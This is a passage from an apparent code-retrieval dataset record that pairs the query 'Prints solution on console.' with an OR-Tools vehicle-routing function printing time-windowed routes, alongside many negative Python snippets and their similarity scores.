config(dev2).ItemWithAA\n assert cr.item\n assert cr.item.b == 0\n\n cr = config(dev3).ItemWithAA\n assert not cr.item\n\n cr = config(pp).ItemWithAA\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def _enabled_warnings(self):\n with warnings.catch_warnings():\n if self.warnings:\n # if self.warnings is set, use it to filter all the warnings\n warnings.simplefilter(self.warnings)\n # if the filter is 'default' or 'always', special-case the\n # warnings from the deprecated unittest methods to show them\n # no more than once per module, because they can be fairly\n # noisy. 
The -Wd and -Wa flags can be used to bypass this\n # only when self.warnings is None.\n if self.warnings in ['default', 'always']:\n warnings.filterwarnings(\n 'module',\n category=DeprecationWarning,\n message=r'Please use assert\\w+ instead.')\n yield", "def configure(self, conf):\n return False", "def test_allow(self, excl, value):\n e = exclude(*excl)\n assert e(fields(C).a, value) is True", "def check_configuration(self):\n self.ensure_one()\n getattr(self, '%s_check_configuration' % self.provider, lambda: None)()", "def _should_ignore_module(cls, module_name):\n # exclude test modules for now to avoid spurious failures\n # TODO(jelle): enable for test modules too\n return module_name.split(\".\")[-1].startswith(\"test\")", "def skip_require():\n global ignore_once\n ignore_once = True", "def suppress(self):\n return self", "def test_hooks_falsy_by_default():\n config = util.read_config(\"some-nonexistant-path\")\n assert not config[\"pre_write\"]\n assert not config[\"post_write\"]", "def test_noop_hiding(self):\n cmdline = [\n \"starfish\",\n \"noop\",\n ]\n if cmdline[0] == 'starfish':\n coverage_cmdline = [\n \"coverage\", \"run\",\n \"-p\",\n \"--source\", \"starfish\",\n \"-m\", \"starfish.starfish\",\n ]\n coverage_cmdline.extend(cmdline[1:])\n cmdline = coverage_cmdline\n\n env = os.environ.copy()\n env[PROFILER_NOOP_ENVVAR] = \"\"\n subprocess.check_call(cmdline, env=env)\n\n with self.assertRaises(subprocess.CalledProcessError):\n subprocess.check_call(cmdline)", "def check_configs(self):\n\n pass", "def warn_default(version):\r\n if config.warn.ignore_bug_before == 'None':\r\n return True\r\n if config.warn.ignore_bug_before == 'all':\r\n return False\r\n if config.warn.ignore_bug_before >= version:\r\n return False\r\n return True", "def test_disable_enabled():\n config_info = read_config()\n config_info['enabled'] = False\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['enabled'] is False", "def _build_non_max_suppressor(type):\n\n if type == model_config.SSD:\n score_threshold = config.cfg.POSTPROCESSOR.SCORE_THRESHOLD\n iou_threshold = config.cfg.POSTPROCESSOR.IOU_THRESHOLD\n max_detections_per_class = config.cfg.POSTPROCESSOR.MAX_DETECTIONS_PER_CLASS\n max_total_detections = config.cfg.POSTPROCESSOR.MAX_TOTAL_DETECTIONS\n elif type == model_config.FASTER_RCNN:\n score_threshold = config.cfg.POSTPROCESSOR.SCORE_THRESHOLD\n iou_threshold = config.cfg.POSTPROCESSOR.IOU_THRESHOLD\n max_detections_per_class = config.cfg.POSTPROCESSOR.MAX_DETECTIONS_PER_CLASS\n max_total_detections = config.cfg.POSTPROCESSOR.MAX_TOTAL_DETECTIONS\n else:\n raise ValueError('type must be ssd or faster_rcnn string')\n\n if iou_threshold < 0 or iou_threshold > 1.0:\n raise ValueError('iou_threshold not in [0, 1.0].')\n if max_detections_per_class > max_total_detections:\n raise ValueError('max_detections_per_class should be no greater than '\n 'max_total_detections.')\n\n non_max_suppressor_fn = functools.partial(\n post_processing.batch_multiclass_non_max_suppression,\n score_thresh=score_threshold,\n iou_thresh=iou_threshold,\n max_size_per_class=max_detections_per_class,\n max_total_size=max_total_detections)\n\n return non_max_suppressor_fn" ]
[ "0.6450392", "0.6399377", "0.63585526", "0.62900907", "0.6012756", "0.59775937", "0.5947511", "0.59247243", "0.5893758", "0.5858456", "0.5848734", "0.5842272", "0.58085376", "0.5727631", "0.56761247", "0.56608504", "0.56291807", "0.5626758", "0.56165975", "0.56113476", "0.56099415", "0.5601553", "0.5590548", "0.55753726", "0.55665565", "0.5565887", "0.55655324", "0.5555759", "0.55383277", "0.5535476", "0.55118203", "0.55088353", "0.5493719", "0.5489097", "0.5486215", "0.5479626", "0.5475961", "0.54757345", "0.54732305", "0.5459962", "0.5448163", "0.5443252", "0.5441131", "0.54261273", "0.5416684", "0.54090184", "0.5405048", "0.54014033", "0.54008985", "0.5392119", "0.5391371", "0.5389246", "0.5387092", "0.5375332", "0.5373596", "0.5364894", "0.53614146", "0.5358748", "0.5354525", "0.5350904", "0.53485876", "0.5347681", "0.5347623", "0.5334418", "0.5333468", "0.5333301", "0.533124", "0.53249675", "0.5324658", "0.53122807", "0.5308454", "0.53060913", "0.5304197", "0.5294077", "0.52917635", "0.52789366", "0.5278676", "0.5277198", "0.52733207", "0.52691436", "0.5264561", "0.5264561", "0.5259098", "0.52465713", "0.5244542", "0.52436376", "0.5236917", "0.5233592", "0.5225037", "0.52243775", "0.5217614", "0.52126867", "0.5212467", "0.52076566", "0.52044755", "0.5196176", "0.5192419", "0.51916116", "0.51904017", "0.51897836" ]
0.6306293
3
Prints solution on console.
def print_solution(data, manager, routing, solution):
    # Route timing is read from the routing model's 'Time' dimension.
    time_dimension = routing.GetDimensionOrDie('Time')
    total_time = 0
    for vehicle_id in range(data['num_vehicles']):
        index = routing.Start(vehicle_id)
        plan_output = 'Route for vehicle {}:\n'.format(vehicle_id)
        while not routing.IsEnd(index):
            # Min/Max of the cumulative variable give the feasible arrival window at this stop.
            time_var = time_dimension.CumulVar(index)
            plan_output += '{0} Time({1},{2}) -> '.format(
                manager.IndexToNode(index), solution.Min(time_var),
                solution.Max(time_var))
            index = solution.Value(routing.NextVar(index))
        # Append the end node and report the total time of this route.
        time_var = time_dimension.CumulVar(index)
        plan_output += '{0} Time({1},{2})\n'.format(manager.IndexToNode(index),
                                                    solution.Min(time_var),
                                                    solution.Max(time_var))
        plan_output += 'Time of the route: {}min\n'.format(
            solution.Min(time_var))
        print(plan_output)
        total_time += solution.Min(time_var)
    print('Total time of all routes: {}min'.format(total_time))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_solution():\n pass", "def solve(self):\n print(\"Problem %s Answer: %s\" % (self.number, self.solution()))", "def printSolution(self):\n print \"----- Solution -----\"\n for feature in self.features:\n print \"Name = \" + feature.name + \" Value = \" + str(feature.value)", "def print_result(solution, states_expanded, max_fringe):\n if solution is None: \n print(\"No solution found.\")\n else: \n print(\"Solution has {} actions.\".format(len(solution)))\n print(\"Total states expanded: {}.\".format(states_expanded))\n print(\"Max fringe size: {}.\".format(max_fringe))", "def print_solution(self, solution_path):\n print(\"---SOLUTION---: \")\n for node in solution_path:\n node.state.plot_cube(\n \"SOLUTION: Node [\" + str(node.id) + \"] at depth \" + str(node.node_depth)\n )\n if node.last_action != None:\n print(\"Next action: \", node.last_action)\n print(\"[\" + str(node.id) + \"] \" + str(node.state.create_md5()))\n\n print(\"\\n TOTAL COST: \", solution_path[len(solution_path) - 1].cost)", "def PrintSolution(self):\n sol = \"\"\n charMap = {\n Magnets.EMPTY: '.',\n Magnets.PLUS: '+',\n Magnets.MINUS: '-',\n }\n for row in self.Solution():\n for space in row:\n sol = sol + charMap.get(space, '?')\n sol = sol + '\\n'\n return sol", "def print_out():\n pass", "def print_solution(solution_list) -> 'Human Readable Solution':\n\tsize = len(solution_list[0][0])\n\ttry:\n\t\tprint('Starting Node'.center(20, ' '))\n\t\tprint(''.center(20, '-'))\n\t\tfor node in solution_list:\n\t\t\t\tfor i in range(size):\n\t\t\t\t\tprint(str(node[i]).center(20, ' '))\n\t\t\t\tprint(''.center(20, '-'))\n\t\tprint('Goal Node'.center(20, ' '))\n\texcept Exception as error_msg:\n\t\tprint(\"No solution found!\")", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def print_solution(self):\n solution_list = [self._board[99]]\n while solution_list[0].previous_square:\n solution_list.insert(0, solution_list[0].previous_square)\n\n for spot in solution_list:\n print(spot)", "def mystery_solved():\n print(\"\\nThe butler: The mystery is solved! I knew it was someone in the family. 
Well done!\")", "def show_solution(self,show):\r\n self.showSolution = show", "def print_problem(self):\n print('\\n*****************')\n print('PROBLEM: ' + self.problem)\n print('OBJECTS: ' + str(self.objects))\n print('INIT: ' + str(self.init))\n print('GOAL: ' + str(self.goal))\n print('AGENTS: ' + str(self.agents))\n print('****************')", "def printSolutions(self):\n\t\tprint \"Computing solutions...\"\n\t\t\n\t\tsolutions = self.problem.getSolutions()\n\t\tnumberOfSolutions = len(solutions)\n\t\t\n\t\tfor i, solution in enumerate(solutions):\n\t\t\titems = solution.items()\n\t\t\t# sort by time\n\t\t\titems.sort(lambda a, b: cmp(a[1], b[1]))\n\t\t\t# sort by order\n\t\t\titems.sort(lambda a, b: cmp(a[0][0], b[0][0]))\n\t\t\t\n\t\t\tprint \"Solution number\", i + 1\n\t\t\t\n\t\t\ti = 1\n\t\t\tfor j in items:\n\t\t\t\tif j[0][0:1] != str(i):\n\t\t\t\t\tif \"enter\" in j[0] or \"finish\" in j[0]:\n\t\t\t\t\t\tprint j,\n\t\t\t\telse:\n\t\t\t\t\tprint \"\\n\",\n\t\t\t\t\tprint \"Order no:\", i\n\t\t\t\t\tif \"enter\" in j[0] or \"finish\" in j[0]:\n\t\t\t\t\t\tprint j,\n\t\t\t\t\ti += 1\n\t\t\tprint \"\\n==============================================\\n\",\n\t\tprint \"Number of solutions:\", numberOfSolutions\n\t\treturn solutions, numberOfSolutions", "def print_solution(self, solution):\n if self._background is None:\n bg_weights = solution[0 : self.nprimaries]\n mod_weights = solution[self.nprimaries : self.nprimaries * 2]\n else:\n bg_weights = self._background\n mod_weights = solution\n\n print(f\"Background spectrum: {self.w2s(bg_weights)}\")\n print(f\"Modulation spectrum: {self.w2s(mod_weights)}\")", "def print_solution(manager, routing, assignment):\n print('Objective: {}'.format(assignment.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(index)\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Objective: {}m\\n'.format(route_distance)", "def print_solution(manager, routing, solution):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Route distance: {}miles\\n'.format(route_distance)", "def print_solution():\n natural = 188\n if is_natural(natural):\n combination = lagrange(int(natural))\n print(f\"{natural} =\", end='')\n for i, value in enumerate(combination):\n print(f\" {value}^2({value ** 2})\",\n \"\" if len(combination) == i+1 else \"+\", end='')\n else:\n print(\"Invalid input. 
Please write correct natural number\")", "def print_solution(manager, routing, assignment):\n print('Objective: {}'.format(assignment.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Objective: {}m\\n'.format(route_distance)", "def print_results(self):\n pass", "def print_solution(\n solution: list[tuple[int, ...]], time_complexity: int, size_complexity: int\n) -> None:\n print(\"\\033[32;1m🎉 The puzzle was solved 🎉\\033[m\")\n print(\n f\"\\033[35;1m{len(solution)-1:,} moves\\033[m were necessary to get to the solution:\"\n )\n for move in solution:\n print(f\"\\t{move}\")\n print(\n f\"\"\"Time complexity = \\033[33;1m{time_complexity\n :,}\\033[m | Size complexity = \\033[33;1m{size_complexity:,}\\033[m\"\"\"\n )", "def printOutput(self):\n pass", "def display_results(_results, model):\n print(\"Optimal solution:\\n\")\n for website in sorted(model.Websites):\n for item in sorted(model.Items):\n if model.Quantity[website, item].value > 0:\n print(\"Buy {q} item(s) of {i} from {w}\".format(q=int(model.Quantity[website, item].value),\n i=item,\n w=website,))\n\n print('')\n print(\"Shipping Cost = {}\".format(model.Cost['Shipping'].value))\n print(\"Product Cost = {}\".format(model.Cost['Item'].value))\n print('')\n\n for i in _results['Solution']:\n print(\"Total Cost = {}\".format(i['Objective']['Objective']['Value']))", "def print_results(self) -> None:\n print(\"=\" * 70, file=sys.stderr)\n total = 0.0\n max_points = 0.0\n for problem in self.problems:\n total += problem.run_tests()\n max_points += problem.max_grade\n print(f\"Total Grade: {total}/{max_points}\", file=sys.stderr)", "def print_solution(manager, routing, solution):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Route distance: {}miles\\n'.format(route_distance)", "def print_solution(data, manager, routing, solution):\n # create a file in order to save the solution steps.\n sol_fpath = gbo.create_results_name()\n print(f'Objective: {solution.ObjectiveValue()}')\n max_route_distance = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n gbo.write_solution_to_file(sol_fpath, plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the 
route distances: {}m'.format(max_route_distance))\n gbo.write_solution_to_file(sol_fpath, \"route distance: \"+str(max_route_distance))", "def print_solution(self):\n print(f'Objective: {self.solution.ObjectiveValue()}')\n total_distance = 0\n total_load = 0\n max_route_distance = 0\n for vehicle_id in range(self.data['num_vehicles']):\n index = self.routingManager.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n route_load = 0\n while not self.routingManager.IsEnd(index):\n node_index = self.manager.IndexToNode(index)\n route_load += self.data['demands'][node_index]\n plan_output += ' {0} Load({1}) -> '.format(self.data['names'][node_index], route_load)\n\n previous_index = index\n index = self.solution.Value(self.routingManager.NextVar(index))\n route_distance += self.routingManager.GetArcCostForVehicle(\n previous_index, index, vehicle_id\n )\n print(route_distance)\n\n plan_output += '{0}, Load({1}) \\n '.format(self.data['names'][self.manager.IndexToNode(index)], route_load)\n\n plan_output += 'Distance of the route: {}\\n'.format(route_distance)\n plan_output += 'Load of the route: {}\\n'.format(route_load)\n\n print(plan_output)\n total_distance += route_distance\n total_load += route_load\n\n print('Total distance of all routes: {}km'.format(total_distance))\n print('Total load of all routes: {}'.format(total_load))", "def print_solution(manager, routing, solution, dima):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Route distance: {} miles\\n'.format(route_distance)\n print(plan_output)", "def test_print_solo(self):\n response = support.create_project(self, 'minneapolis')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n print_string = string.ascii_lowercase\n\n code = '\\n'.join([\n 'values = [x ** 2 for x in range(100)]',\n 'print(\"{}\")'.format(print_string)\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(print_string),\n 2,\n 'should have printed ascii lowercase'\n )", "def _debug_print_soln(self, m):\n print('*'*80)\n print('DEBUGG solution:')\n print(' objective value:', m.obj())\n for c, comp in enumerate(m.Components):\n name = comp.name\n print(' component:', c, name)\n for res, r in m.resource_index_map[comp].items():\n print(' resource:', r, res)\n for t, time_index in enumerate(m.T):\n prod = getattr(m, '{n}_production'.format(n=name))\n print(' time:', t, time_index, prod[r, time_index].value)\n print('*'*80)", "def test_print_result(capsys):\n assert \"\"\"Total 5 hands solved\nTotal 4 hands solved with hint\nTotal 4 hands failed to solve\"\"\" in hl.test_help_print_result(capsys)", "def target_found( self ):\n print( \"Solution: \" + self.path );", "def generateSolution(self, cont):\n solnf = self.outdir + \"/tracks_soln.csv\"\n old = os.dup(1)\n sys.stdout.flush()\n 
os.close(1)\n os.open(solnf, os.O_WRONLY | os.O_CREAT)\n cont.printallSolutions(yetkin=self.yetkin)\n sys.stdout.flush()\n os.close(1)\n os.dup(old)\n os.close(old)", "def display_problem():\n return \"\\nFind the difference between the sum of the squares of the first one hundred natural numbers and the \" \\\n \"square of the sum.\\n\"", "def print_outcome(self) -> None:\n pass", "def print_output(self):\n print(\"Reference score: \" + str(self.PotTax_reference.sum().TFI))\n print(\"Intervention score: \" + str(self.PotTax_intervention.sum().TFI))\n return", "def main():\n data = read_data()\n print('Part one solution: {}'.format(part_one(data)))\n print('Part two solution: {}'.format(part_two(data)))", "def print_report(self):\n\n if not self._translation:\n print('Failed to translate ciphertext.')\n return\n\n plaintext = self.ciphertext.translate(\n SubSolver._make_trans_from_dict(self._translation))\n print('Ciphertext:')\n print(self.ciphertext, '\\n')\n print('Plaintext:')\n print(plaintext, '\\n')\n\n print('Substitutions:')\n items = [key + ' -> ' + word for key, word\n in self._translation.items()]\n items.sort()\n i = 0\n for item in items:\n print(item + ' ', end='')\n if i % 5 == 4:\n print('')\n i += 1", "def main():\n cli = Cli()\n res = cli.run()\n if res:\n print(res.strip())", "def main(args):\n # Results: print to console and also write to output file\n pass", "def SolveAndPrint(self, model, decisions, constraints):\n\t\tself.root = Toplevel()\n\t\tmenubar = Menu(self.root)\n\t\ttext=Text(self.root)\n\t\t\n\t\tfilemenu=Menu(menubar, tearoff=0)\n\t\tfilemenu.add_command(label=\"Save As...\", \n\t\t\t\t\tcommand=(lambda text=text: file_save(text)), \n\t\t\t\t\taccelerator=\"Ctrl+Shift+S\")\n\n\t\tfilemenu.add_command(label=\"Reload Module\", command=(lambda: reload(simplex_class)), accelerator=\"Ctrl+T\")\n\n\t\tfilemenu.add_command(label=\"Close\", \n\t\t\t\t\tcommand=donothing, \n\t\t\t\t\taccelerator=\"Ctrl+w\") #come back to this\n\t\tfilemenu.add_separator()\n\t\tfilemenu.add_command(label=\"Exit\", command=self.root.quit)\n\n\t\tmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n\t\thelpmenu = Menu(menubar, tearoff=0)\n\t\thelpmenu.add_command(label=\"Help\", command=donothing) #come back to this\n\t\ttext.insert(END, \n\t\t\t\t\"\\nNumber of variables = %d\\n\"%(model.NumVariables()))\n\n\t\tprint (\"Number of variables = %d\"%(model.NumVariables()))\n\t\tprint (\"Number of constraints = %d\"%(model.NumConstraints()))\n\n\t\ttext.insert(END, \"\\nNumber of constraints = %d\\n\"%(model.NumConstraints()))\n\t\t\n\t\tresult_status = model.Solve()\n\n\t\ttext.insert(END, \"\\nsolve output = %s\"%(result_status))\n\n\t\tassert model.VerifySolution(1e-7, True), \"model is not verifiable\" # % equivalent to infeasibility\n\n\t\tassert result_status == pywraplp.Solver.OPTIMAL, \"not an optimal solution present\" #The problem has an optimal solution\n\n\t\ttext.insert(END, \"\\nProblem solved in %f ms \\n\"%(model.wall_time()))\n\n\t\tprint (\"\\nProblem solved in %f milliseconds \\n\" %(model.wall_time()))\n\n\t\ttext.insert(END, \"\\nOptimal objective value = %f \\n\" %(model.Objective().Value())) #The objective value of the solution `no reduced costs`\n\t\tprint (\"\\nOptimal objective value = %f\\n\" %(model.Objective().Value()))\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n%s = %f\\n\"%(variable.name(), variable.solution_value()))\n\t\t\tprint (\"%s = %f\" %(variable.name(), variable.solution_value()))\n\n\t\ttext.insert(END, \"\\n \\nAdvanced 
Usage: \\n\")\n\t\tprint (\"\\n \\nAdvanced Stats: \\n\")\n\t\ttext.insert(END, \"\\n \\nProblem Solved in %d iterations\"%model.iterations())\n\t\tprint (\"\\n \\n Problem solved in %d iterations\" %model.iterations())\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n \\n%s: reduced cost = %f\" %(variable.name(), \n\t\t\t\t\t\t\t\t\tvariable.reduced_cost()))\n\t\t\tprint (\"%s: reduced cost = %f\" %(variable.name(), variable.reduced_cost()))\n\n\t\tactivities = model.ComputeConstraintActivities() #printout of RHS = `b` in AX = b\n\n\t\tfor i, constraint in enumerate(constraints):\n\t\n\t\t\tprint(dir(constraint))\n\t\t\ttext.insert(END, \n\t\t\t\t\"\\n\\n constraint %s: dual value = %f\\n activity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(), \n\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\n\t\t\tprint (\"constraint %s: dual value = %f\\nactivity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(),\n\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\t\t\ttext.insert(END, \n\t\t\t\t\t\"\\n \\n constraint %s Lower to Upper Boundary:\\n \\t %f < %.2d < %f\" %(constraint.name(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Ub()))\n\n\t\t\tprint (\"constraint %s Lower.....to.....Upper Boundary: %f < %.2d < %f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Ub()))\n\t\ttext.config(state=DISABLED)\n\t\ttext.pack()\n\t\tself.root.config(menu=menubar)", "def answer():\n print(\"\\nJetzt befindest du dich in einer wunderschönen Welt, doch du stellst fest das es verschiedene Wege gibt. 
Du bemerkst sofort, dass es Im rechten dagegen hat es sehr viel Wasser mit Krokodile hat, der linke Weg dagegen sieht wunderschön aus!\")", "def _do_outputs(self):\n self._puzzle.display_revealed_puzzle()\n hint = self._puzzle.get_hint()\n self._console.write(hint)\n print(\"\")\n self._jumper.draw_jumper()\n print(\"\")\n\n # These ifs end the game\n if self._puzzle.is_solved():\n self._keep_playing = False\n self._puzzle.display_win_screen()\n \n if self._puzzle.incorrect_guesses >= 4:\n self._keep_playing = False\n self._puzzle.display_loss_screen()", "def test_get_solution(self):\n pass", "def phrase_output(self, phrase):\n Phrase(self.selected_phrase, self.player_guess, False, False)\n print('{}'.format(''.join(self.consol_output)))", "def main():\r\n print(\"JoJo\")", "def show_result():\n print(\"I win!!\")", "def print_solution_position(solution: str, puzzle: str) -> None:\r\n print(\r\n \"Solution:\\n{}\\n\\nCurrent position:\\n{}\\n\".format(\r\n generate_grid(solution), generate_grid(puzzle)\r\n )\r\n )", "def display():\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # Call the write method with sys.stdout as the file.\n write(file=sys.stdout)", "def main():\n parser = argparse.ArgumentParser(\n description=\"Returns back the entire solution graph.\")\n parser.add_argument(\"-M\", \"--master\", type=str, default=\"local[8]\",\n help=\"url of the master for this job\")\n parser.add_argument(\"-O\", \"--output\", type=str, default=\"solution-out\",\n help=\"name of the output file\")\n parser.add_argument(\"-H\", \"--height\", type=int, default=2,\n help=\"height of the puzzle\")\n parser.add_argument(\"-W\", \"--width\", type=int, default=2,\n help=\"width of the puzzle\")\n args = parser.parse_args()\n\n\n # open file for writing and create a writer function\n output_file = open(args.output, \"w\")\n writer = lambda line: output_file.write(line + \"\\n\")\n\n # call the puzzle solver\n solve_sliding_puzzle(args.master, writer, args.height, args.width)\n\n # close the output file\n output_file.close()", "def main():\n # output filename\n param = read_parameters('Kanki01_input.yaml')\n s = seal(param)\n s.solve_zeroth()\n s.plot_res()", "def printhelp():", "def print_results(self):\n for test_cases in self._tests:\n for test_case in test_cases:\n print('{} ...ok'.format(test_case.get_name()))\n return 0", "def show_main_screen():\n option = algo_selection(algos)\n if option == 1:\n print_factorial()\n show_main_screen()\n if option == 2:\n print_gcd()\n show_main_screen()\n if option == 3:\n print_pow()\n show_main_screen()\n if option == 4:\n print_towers()\n show_main_screen()\n if option == 5:\n print_permutations()\n show_main_screen()\n if option == 6:\n raise SystemExit(0)", "def __str__(self):\n return f'{self.text}: {self.chs}, correct answer: {self.solution}'", "def print_solution(data, manager, routing, assignment):\n total_distance = 0\n total_load = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n route_load = 0\n while not routing.IsEnd(index):\n node_index = manager.IndexToNode(index)\n route_load += data['demands'][node_index]\n plan_output += ' {0} Load({1}) -> '.format(node_index, route_load)\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += ' {0} 
Load({1})\\n'.format(manager.IndexToNode(index),\n route_load)\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n plan_output += 'Load of the route: {}\\n'.format(route_load)\n # print(plan_output)\n total_distance += route_distance\n total_load += route_load\n with open(f\"Survey/vrp-nanostores/vrp-nanostores/food_deserts/outputs/2-e/clust8/route/route_vehicle{vehicle_id}.txt\", \"w\") as file:\n file.write(plan_output)\n file.close()\n print(\"aaa\")\n print('Total cost for all routes: {}m'.format(total_distance))\n print('Total load of all routes: {}'.format(total_load))\n with open(f\"Survey/vrp-nanostores/vrp-nanostores/food_deserts/outputs/2-e/clust8/load_dist_{data['num_vehicles']}vehicles.txt\", \"w\") as file:\n out_file = \"\"\n out_file += str(total_load) + \",\" + str(total_distance)\n file.write(out_file)\n file.close() # OPEN AND ANALYZE LATER WITH PANDAS", "def cli(argv):\r\n args = get_args(argv)\r\n verbosity = \"summary\"\r\n if args.verbose:\r\n verbosity = \"report\"\r\n report = evaluate(args.design, verbosity)\r\n print json.dumps(report, indent=4)", "def SolveAndPrint(self, model, decisions, constraints, solver_type):\n\t\ttry:\n\t\t\tresult_status = model.Solve()\n\t\t\tassert result_status == pywraplp.Solver.OPTIMAL #The problem has an optimal solution\n\t\t\tassert model.VerifySolution(1e-7, True)\n\t\t\tprint (\"Success\")\n\n\t\texcept AssertionError:\n\t\t\tresult_status = 3\n\t\t\tprint('linear problem is not sovable/infeasible for %s method'%(solver_type))\n\t\t\ttkMessageBox.showerror('infeasible', message='Problem is infeasible, no x* node for %s'%(solver_type))\n\t\t\tif solver_type == 'clp':\n\t\t\t\treturn self.optimization_problem(2,\n\t\t\t\t\t\t\t\t self.variables,\n\t\t\t\t\t\t\t\t self.constraints,\n\t\t\t\t\t\t\t\t self.type,\n\t\t\t\t\t\t\t\t self.objective,\n\t\t\t\t\t\t\t\t 'glop')\n\t\t\telse:\n\n\t\t\t\tprint('an error has occured, please review data')\n\t\t\t\ttkMessageBox.showerror('an error has occured, please review data')\n\t\t\t\treturn\t\n\n\t\tfinally:\n\t\t\tpass\n\n\t\t######## SOLUTION IS OPTIMAL ######\n\t\tself.root = Toplevel()\n\t\tmenubar = Menu(self.root)\n\t\ttext=Text(self.root)\n\t\n\t\tfilemenu=Menu(menubar, tearoff=0)\n\t\tfilemenu.add_command(label=\"Save As...\", \n\t\t\t\t\tcommand=(lambda text=text: file_save(text)), \n\t\t\t\t\taccelerator=\"Ctrl+Shift+S\")\n\n\t\tfilemenu.add_command(label=\"Reload Module\", \n\t\t\t\t\tcommand=(lambda: reload(simplex_class)), \n\t\t\t\t\taccelerator=\"Ctrl+T\")\n\n\t\tfilemenu.add_command(label=\"Close\", \n\t\t\t\t\tcommand=(lambda: checkwork(self.root, text)), \n\t\t\t\t\taccelerator=\"Ctrl+w\") #come back to this\n\t\tfilemenu.add_separator()\n\t\tfilemenu.add_command(label=\"Exit\", command=(lambda: checkwork(self.root, text)))\n\n\t\tmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n\t\thelpmenu = Menu(menubar, tearoff=0)\n\t\thelpmenu.add_command(label=\"Help\", command=donothing) #come back to this\n\n\n\t\t################### STATS ########################\n\t\ttext.insert(END, \"\\n ___%s___ \\n\" %(self.title.upper()))\n\n\t\ttext.insert(END, \"\\nsolve output = %s\"%(result_status))\n\t\tprint(\"\\n\\nsolve output = 